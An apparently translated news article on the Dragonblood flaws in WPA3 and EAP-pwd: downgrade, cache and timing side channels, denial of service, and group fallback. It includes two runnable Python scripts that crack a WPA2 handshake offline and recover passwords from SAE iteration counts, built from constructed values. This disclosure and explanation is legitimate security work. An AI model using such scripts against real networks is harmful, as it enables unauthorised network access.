Vulnerabilities in WPA3 and EAP-pwd wireless security technology

Mathy Vanhoef, author of the KRACK attack on WPA2 wireless networks, and Eyal Ronen, co-author of several attacks on TLS, have disclosed six vulnerabilities (CVE-2019-9494 through CVE-2019-9499) in the protection mechanisms of WPA3 wireless networks. They allow an attacker to recover the network password and thereby gain access to the wireless network without knowing the password in advance. The vulnerabilities are grouped under the code name Dragonblood and compromise the Dragonfly handshake (SAE, Simultaneous Authentication of Equals), whose very purpose is to protect the password against offline guessing. Besides WPA3, the Dragonfly method is also used to protect against dictionary attacks in the EAP-pwd protocol, which is supported by Android, RADIUS servers, and hostapd/wpa_supplicant.

The study identified two main classes of design flaws in WPA3; both can ultimately be used to recover the access password. The first class permits a fallback to weaker cryptographic methods (downgrade attack): the mechanism for compatibility with WPA2 (transition mode, in which both WPA2 and WPA3 are allowed) lets an attacker force the client into the WPA2 four-way handshake, after which the classic brute-force attacks on WPA2 passwords apply. In addition, a downgrade attack directly against the Dragonfly handshake was found that forces a rollback to less secure elliptic-curve groups.
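The WPA2 downgrade above ends in an ordinary WPA2 four-way handshake, and the reason it matters is that message 2 of that handshake already carries a MIC computed from the password-derived key. The following script, added here as an example and not code from the Dragonblood authors, shows the offline dictionary attack that becomes possible once message 2 has been captured: it derives the PMK, the PTK and the EAPOL-Key MIC the way WPA2-Personal does, and compares the recomputed MIC for each dictionary word against the captured one. The SSID, MAC addresses, nonces, RSNE and passphrase are constructed values, and the "captured" message 2 is built locally from them.

```python
"""Offline dictionary attack on a WPA2 four-way handshake after a downgrade.

Constructed example: SSID, MAC addresses, nonces, RSNE and passphrase are made
up, and the EAPOL-Key message 2 is built here from them. This is not the
Dragonblood authors' code; it only shows why message 2 alone suffices.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 802.1X header (4) + descriptor type (1) + key info (2) +
                 # key length (2) + replay counter (8) + nonce (32) + IV (16) +
                 # RSC (8) + key ID (8) = 81 bytes precede the 16-byte MIC
MIC_LEN = 16


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || i."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the values visible in handshake messages 1 and 2."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for AKM 00-0F-AC:2: HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 128 bits. KCK is the first 16 bytes of the PTK."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, rsne: bytes, kck: bytes) -> bytes:
    """Supplicant's EAPOL-Key message 2 (key info 0x010a: MIC | Pairwise | v2)."""
    body = (
        b"\x02"                     # descriptor type: RSN
        + b"\x01\x0a"               # key information
        + b"\x00\x10"               # key length
        + (1).to_bytes(8, "big")    # replay counter
        + snonce
        + b"\x00" * 16              # key IV
        + b"\x00" * 8               # key RSC
        + b"\x00" * 8               # key ID
        + b"\x00" * MIC_LEN         # MIC placeholder
        + struct.pack(">H", len(rsne))
        + rsne                      # key data: the supplicant's RSNE
    )
    frame = b"\x01\x03" + struct.pack(">H", len(body)) + body
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


# Constructed "captured" material: what the rogue WPA2 access point holds after
# message 2, before the client gets to check the RSNE in message 3.
SSID = b"CorpNet"
AA = bytes.fromhex("0200a1b2c3d4")     # rogue AP (authenticator) MAC, made up
SPA = bytes.fromhex("0200112233ee")    # client (supplicant) MAC, made up
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
RSNE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK
WORDLIST = [b"password", b"letmein", b"sunflower42", b"correcthorse", b"wpa3wpa3"]


def capture_handshake(passphrase: bytes) -> dict:
    """Simulate the victim answering the rogue AP's message 1 with message 2."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE,
            "snonce": SNONCE, "msg2": build_msg2(SNONCE, RSNE, kck)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: recompute the MIC per candidate, stop on a match."""
    msg2 = capture["msg2"]
    target_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in wordlist:
        pmk = derive_pmk(word, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target_mic):
            return word
    return None


if __name__ == "__main__":
    cap = capture_handshake(b"correcthorse")
    print("recovered passphrase:", crack(cap, WORDLIST))
```

Nothing in `crack` needs message 3: the AP's ANonce (message 1), the client's SNonce and MIC (message 2), both MAC addresses and the SSID are sufficient, which is why the client's later RSNE check in message 3 comes too late to prevent the offline attack.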

The second class leaks information about the password through side channels. It stems from flaws in Dragonfly's password encoding, which lets indirect data, such as variations in the latency of operations, be used to recover the original password. Dragonfly's hash-to-curve algorithm (mapping the password to a point on an elliptic curve) is vulnerable to a cache attack (observing which code paths leave traces in the processor cache), and its hash-to-group algorithm (mapping the password to an element of a multiplicative MODP group) is vulnerable to a timing attack (measuring how long the operation takes).

To carry out the cache attack, the attacker must be able to run unprivileged code on the system of the user connecting to the wireless network. Both methods yield information that tells the attacker whether a partial guess at the password is consistent with the observations, so the password can be recovered progressively. The attack is quite efficient: an 8-character password consisting of lowercase letters can be recovered by intercepting only 40 handshakes and spending computing resources equivalent to about $125 of rented Amazon EC2 capacity.

Based on the identified vulnerabilities, several attack scenarios have been proposed:

  • Downgrade attack to WPA2 enabling a dictionary attack. When both the client and the access point support WPA3 and WPA2, an attacker can deploy a rogue access point with the same network name (SSID) that supports only WPA2. The client will then run the WPA2-specific four-way handshake, during which the illegitimate downgrade is eventually detected, but only at a stage when the handshake messages already sent contain all the information needed for an offline dictionary attack. The same technique can be used to force a fallback to problematic elliptic-curve groups in SAE.

    In addition, the iwd daemon, developed by Intel as an alternative to wpa_supplicant, and the wireless stack of the Samsung Galaxy S10 were found to be susceptible to the downgrade even on WPA3-only networks: if these devices have previously connected to a WPA3 network, they will still attempt to connect to a rogue WPA2 network of the same name.

  • Side-channel attack extracting information from the processor cache. The password encoding algorithm in Dragonfly contains conditional branches, and an attacker able to run code on the wireless user's system can determine which branch of an if-then-else block was taken by analysing cache behaviour. The information obtained can be used for progressive password guessing with methods similar to the offline dictionary attacks used against WPA2 passwords. As a countermeasure, it is proposed to switch to constant-time operations whose execution time does not depend on the data being processed;
  • Side-channel attack based on the timing of operations. The Dragonfly code uses several multiplicative groups modulo a prime (MODP groups), and the number of iterations of its password encoding loop depends on the password and on the MAC addresses of the access point and the client. A remote attacker can determine how many iterations were performed during password encoding and use that as a clue in progressive password guessing.
  • Denial of service. An attacker can block certain functions of the access point by exhausting its resources with a large number of handshake requests. To bypass the flood protection provided in WPA3 (the anti-clogging token mechanism), it is enough to send the requests from spoofed, non-repeating MAC addresses.
  • Fallback to less secure cryptographic groups in the WPA3 handshake. For example, if a client supports the P-521 and P-256 elliptic curves and prefers P-521, the attacker, regardless of whether the access point supports P-521, can force the client to use P-256. The attack is carried out by dropping some messages during the handshake and sending forged messages claiming that certain elliptic-curve groups are unsupported.
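The two side-channel items above both come down to the same loop: Dragonfly's "hunting and pecking" password encoding tries successive counter values until the derived value lands in the group, so the number of iterations (what the timing attack measures) and the branch taken in each iteration (what the cache attack observes) depend on the password and the two MAC addresses. The script below, added here as an example and not the Dragonblood authors' tools or hostapd's code, implements that loop for a MODP group and then shows the recovery step: an attacker sends Commit frames from a series of spoofed client MACs, records the iteration count for each, and keeps only the dictionary words that reproduce every count. The modulus, subgroup order, simplified KDF, MAC addresses, target password and dictionary are all constructed stand-ins; the iteration count is read from the function directly instead of being inferred from response timing.

```python
"""Toy Dragonfly (SAE) hunting-and-pecking loop for a MODP group, plus the
iteration-count filter that the timing side channel makes possible.

Constructed example: the modulus, subgroup order, simplified KDF, MAC
addresses, password and dictionary are stand-ins so the script runs offline.
None of it is the real SAE group data, hostapd code or the Dragonblood tools.
"""
import hashlib
import hmac

# Toy modulus p = 3 * 2**30 + 1 (prime, 32 bits, leading byte 0xC0). A uniform
# 32-bit KDF output exceeds p about 25% of the time, so the loop count varies
# with the password and MAC addresses. The RFC 5114 MODP groups 22-24 used by
# SAE share this property because their moduli do not start with a run of
# one bits; that is what Dragontime exploits.
P = 3221225473
R = 2 ** 30              # toy subgroup order; real groups use a prime-order subgroup
EXPONENT = (P - 1) // R  # = 3
BITS = P.bit_length()    # 32
LABEL = b"SAE Hunting and Pecking"


def pwd_seed(password: bytes, addr_a: bytes, addr_b: bytes, counter: int) -> bytes:
    """pwd-seed = H(max(addr) || min(addr), password || counter), H = HMAC-SHA256."""
    key = max(addr_a, addr_b) + min(addr_a, addr_b)
    return hmac.new(key, password + bytes([counter]), hashlib.sha256).digest()


def kdf(seed: bytes, bits: int) -> int:
    """Simplified KDF-n: one HMAC-SHA256 block truncated to `bits` bits (the
    spec iterates HMAC with a counter; one block suffices for a 32-bit p)."""
    out = hmac.new(seed, LABEL + bits.to_bytes(2, "big"), hashlib.sha256).digest()
    return int.from_bytes(out, "big") >> (256 - bits)


def hunt_and_peck(password: bytes, addr_a: bytes, addr_b: bytes):
    """Derive the password element PWE. Returns (PWE, iterations); the
    iteration count is exactly what timing the peer's response leaks."""
    for counter in range(1, 256):          # counter is a single octet in SAE
        value = kdf(pwd_seed(password, addr_a, addr_b, counter), BITS)
        if value < P:                      # data-dependent branch #1
            pwe = pow(value, EXPONENT, P)  # map the value into the subgroup
            if pwe > 1:                    # data-dependent branch #2
                return pwe, counter
    raise RuntimeError("no PWE found within 255 iterations")


def spoofed_macs(n: int):
    """Locally administered client MACs the attacker cycles through (made up)."""
    return [b"\x02\x00\x00\x00\x00" + bytes([i]) for i in range(n)]


def observe_iterations(password: bytes, ap_mac: bytes, client_macs):
    """What the attacker learns by timing the AP's reply to a Commit frame sent
    from each spoofed MAC. Here the count is read directly instead of timed."""
    return [hunt_and_peck(password, ap_mac, mac)[1] for mac in client_macs]


def filter_candidates(candidates, ap_mac: bytes, client_macs, observed):
    """Keep only dictionary words whose iteration counts match every
    observation (the core of a Dragonforce-style recovery)."""
    return [c for c in candidates
            if observe_iterations(c, ap_mac, client_macs) == observed]


AP_MAC = bytes.fromhex("0200a1b2c3d4")   # constructed access point MAC
TARGET = b"sunflower42"                   # constructed network password
DICTIONARY = [b"password", b"letmein", b"dragonfly", b"sunflower42", b"wpa3wpa3",
              b"qwerty123", b"iloveyou", b"hunter2", b"admin", b"welcome1"]


def recover(target: bytes = TARGET, candidates=DICTIONARY, n_macs: int = 40):
    """Full loop: one measurement per spoofed MAC, then filter the dictionary."""
    macs = spoofed_macs(n_macs)
    observed = observe_iterations(target, AP_MAC, macs)
    return filter_candidates(candidates, AP_MAC, macs, observed)


if __name__ == "__main__":
    print("observed iteration counts:",
          observe_iterations(TARGET, AP_MAC, spoofed_macs(40)))
    print("surviving candidates:", recover())
```

Each spoofed MAC gives an independent measurement, so a handful of dozen Commit exchanges is enough to discard almost every wrong dictionary word; a real attack replaces the direct read of the counter with response-time measurements, and the two commented branches are also the ones a cache attack on the client can observe per iteration. The defence named above, a constant-time loop that always runs a fixed number of iterations regardless of when the first hit occurs, removes the dependency of both the count and the branch pattern on the password.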

To check devices for the vulnerabilities, several scripts with example attacks have been prepared:

  • Dragonslayer - an implementation of the attacks on EAP-pwd;
  • Dragondrain - a utility for checking an access point's implementation of the Simultaneous Authentication of Equals (SAE) handshake for vulnerabilities that can be used to mount a denial of service;
  • Dragontime - a script for carrying out the timing side-channel attack against SAE, exploiting the difference in processing time when MODP groups 22, 23 and 24 are used;
  • Dragonforce - a utility for password recovery (password guessing) based on the information obtained from the timing differences or from cache observations.

The Wi-Fi Alliance, which develops the wireless standards, stated that the problem affects a limited number of early implementations of WPA3-Personal and can be fixed through firmware and software updates. No exploitation of the vulnerabilities for malicious purposes has been recorded so far. To improve security, the Wi-Fi Alliance has added tests to its device certification program to verify correct implementations and has contacted device manufacturers to coordinate fixes for the identified issues. Patches have already been released for hostapd/wpa_supplicant. Package updates are available for Ubuntu. On Debian, RHEL, SUSE/openSUSE, Arch, Fedora and FreeBSD the issues remain unfixed.

Source: opennet.ru